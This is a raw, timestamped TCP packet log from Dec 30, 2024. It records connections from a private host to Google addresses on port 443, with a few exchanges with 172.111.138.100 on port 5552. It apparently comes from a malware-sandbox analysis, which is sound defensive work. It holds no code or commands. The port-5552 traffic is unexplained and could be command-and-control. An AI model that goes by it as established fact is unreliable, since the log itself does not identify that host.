                                                                                                                      Dec 30, 2024 11:40:58.976962090 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.447211027 CET44349988142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.447271109 CET49988443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:59.448326111 CET49988443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:59.448335886 CET44349988142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.450243950 CET49988443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:59.450248003 CET44349988142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.460285902 CET44349989142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.460340023 CET49989443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.460836887 CET49989443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.460840940 CET44349989142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.462907076 CET49989443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.462913036 CET44349989142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.575141907 CET44349993142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.576091051 CET49993443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.576682091 CET49993443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.576689005 CET44349993142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.577116013 CET49993443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.577120066 CET44349993142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.587269068 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.587498903 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:59.587882996 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:59.587889910 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.588058949 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:59.588064909 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.841660976 CET44349989142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.841806889 CET49989443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.841836929 CET44349989142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.841876030 CET49989443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.842032909 CET49989443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.842071056 CET44349989142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.842132092 CET49989443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.842262030 CET44349989142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.842278004 CET49989443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.842308044 CET49989443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.842897892 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.842937946 CET44350001142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.843005896 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.843319893 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.843331099 CET44350001142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.856451035 CET44349988142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.856498957 CET44349988142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.856556892 CET49988443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:59.856584072 CET44349988142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.856599092 CET49988443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:59.856600046 CET44349988142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.856642962 CET49988443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:59.857294083 CET49988443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:59.857309103 CET44349988142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.858045101 CET50003443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:59.858078957 CET44350003142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.858280897 CET50003443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:59.858860016 CET50003443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:59.858869076 CET44350003142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.944607973 CET44349993142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.944758892 CET49993443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.944771051 CET44349993142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.944922924 CET49993443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.946275949 CET44349993142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.946331024 CET44349993142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.946340084 CET49993443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.946403027 CET49993443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.947091103 CET49993443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.947107077 CET44349993142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.947770119 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.947812080 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:59.947957993 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.948170900 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:59.948180914 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.008344889 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.008416891 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.008436918 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.008455038 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.008498907 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.008498907 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.008507967 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.008538961 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.008553028 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.008589029 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.008589983 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.008632898 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.009393930 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.009413004 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.010301113 CET50005443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.010346889 CET44350005142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.011064053 CET50005443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.011267900 CET50005443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.011281013 CET44350005142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.460670948 CET44350003142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.460761070 CET50003443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.462104082 CET50003443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.462111950 CET44350003142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.462326050 CET50003443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.462331057 CET44350003142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.470429897 CET44350001142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.470510006 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.471267939 CET44350001142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.471354961 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.473751068 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.473781109 CET44350001142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.474117994 CET44350001142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.474203110 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.474710941 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.515376091 CET44350001142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.568180084 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.568299055 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.570100069 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.570158958 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.572122097 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.572133064 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.572489977 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.572726965 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.573097944 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.616168022 CET44350005142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.616285086 CET50005443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.619333029 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.629517078 CET50005443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.629528046 CET44350005142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.629833937 CET50005443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.629838943 CET44350005142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.852119923 CET44350001142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.852324009 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.852324009 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.852452040 CET44350001142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.852554083 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.853075981 CET50012443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.853127956 CET44350012142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.853324890 CET50012443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.853493929 CET50012443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.853507042 CET44350012142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.868405104 CET44350003142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.868453026 CET44350003142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.868566036 CET44350003142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.868568897 CET50003443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.868568897 CET50003443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.868693113 CET50003443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.875277996 CET50013443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.875302076 CET44350013142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.875343084 CET50003443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.875361919 CET44350003142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.875554085 CET50013443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.875962973 CET50013443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.875973940 CET44350013142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.945935965 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.946106911 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.946137905 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.946269035 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.946985006 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.947026014 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.947056055 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.948714018 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.950999975 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.951016903 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.952733994 CET50014443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.952783108 CET44350014142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.952954054 CET50014443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.953316927 CET50014443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.953325987 CET44350014142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.026571989 CET44350005142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.026644945 CET44350005142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.026684046 CET50005443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.026704073 CET44350005142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.026791096 CET44350005142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.026833057 CET50005443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.027163982 CET50005443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.028588057 CET50015443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.028621912 CET50005443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.028635025 CET44350005142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.028645039 CET44350015142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.028728962 CET50015443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.029037952 CET50015443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.029053926 CET44350015142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.455436945 CET44350012142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.459778070 CET50012443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.472987890 CET50012443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.473006010 CET44350012142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.487166882 CET50012443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.487175941 CET44350012142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.500325918 CET44350013142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.500966072 CET50013443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.502970934 CET50013443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.502970934 CET50013443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.502979040 CET44350013142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.502994061 CET44350013142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.560048103 CET44350014142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.560132980 CET50014443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.562324047 CET50014443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.562338114 CET44350014142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.562731981 CET50014443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.562740088 CET44350014142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.629976034 CET44350015142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.630101919 CET50015443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.630652905 CET50015443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.630669117 CET44350015142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.630911112 CET50015443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.630917072 CET44350015142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.740562916 CET555249971172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.740626097 CET499715552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:01.779886007 CET499715552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:01.784667015 CET555249971172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.825685024 CET44350012142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.825762033 CET50012443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.825916052 CET50012443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.825967073 CET44350012142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.826021910 CET50012443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.826610088 CET50021443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.826657057 CET44350021142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.826719046 CET50021443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.826997042 CET50021443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.827008963 CET44350021142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.881227970 CET50013443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.881386995 CET50014443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.881412029 CET50015443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.882220984 CET50022443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.882272005 CET44350022142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.882329941 CET50022443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.884140968 CET50022443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:01.884166002 CET44350022142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.884551048 CET50023443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.884569883 CET44350023142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.884619951 CET50023443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.886924028 CET50023443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:01.886949062 CET44350023142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.427004099 CET44350021142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.427084923 CET50021443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.428212881 CET44350021142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.428261042 CET50021443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.429984093 CET50021443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.429995060 CET44350021142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.430313110 CET44350021142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.430358887 CET50021443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.430717945 CET50021443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.475332975 CET44350021142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.483290911 CET44350022142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.483412027 CET50022443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:02.483947039 CET50022443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:02.483952999 CET44350022142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.484277010 CET50022443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:02.484282970 CET44350022142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.487056017 CET44350023142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.487138033 CET50023443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.488789082 CET44350023142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.488840103 CET50023443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.492407084 CET50023443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.492413044 CET44350023142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.492887974 CET44350023142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.492939949 CET50023443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.493408918 CET50023443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.539334059 CET44350023142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.803591013 CET44350021142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.803734064 CET50021443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.803750992 CET44350021142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.803848982 CET50021443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.804724932 CET44350021142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.804790974 CET44350021142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.804928064 CET50021443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.806314945 CET50021443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.806329966 CET44350021142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.807173014 CET50031443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.807223082 CET44350031142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.807405949 CET50031443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.809178114 CET50031443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.809202909 CET44350031142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.809621096 CET50032443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:02.809653997 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.810725927 CET50032443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:02.811150074 CET50032443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:02.811161995 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.868582964 CET44350023142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.868693113 CET50023443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.868936062 CET50023443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.869005919 CET44350023142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.869223118 CET44350023142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.869251966 CET50023443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.869440079 CET50023443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.869884014 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.869911909 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.870055914 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.870253086 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:02.870265007 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.916310072 CET44350022142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.916368008 CET44350022142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.916410923 CET50022443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:02.916428089 CET44350022142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.916460991 CET50022443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:02.916555882 CET44350022142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.916575909 CET50022443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:02.916785955 CET50022443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:02.917834997 CET50022443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:02.917848110 CET44350022142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.918123960 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:02.918154955 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:02.918360949 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:02.918466091 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:02.918478966 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.411469936 CET44350031142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.411829948 CET50031443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.412256002 CET44350031142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.412962914 CET50031443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.416702032 CET50031443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.416714907 CET44350031142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.416977882 CET44350031142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.417139053 CET50031443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.417627096 CET50031443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.439688921 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.439779043 CET50032443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.440334082 CET50032443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.440346956 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.442265034 CET50032443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.442270041 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.463330984 CET44350031142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.494177103 CET44350033142.250.185.78192.168.2.6
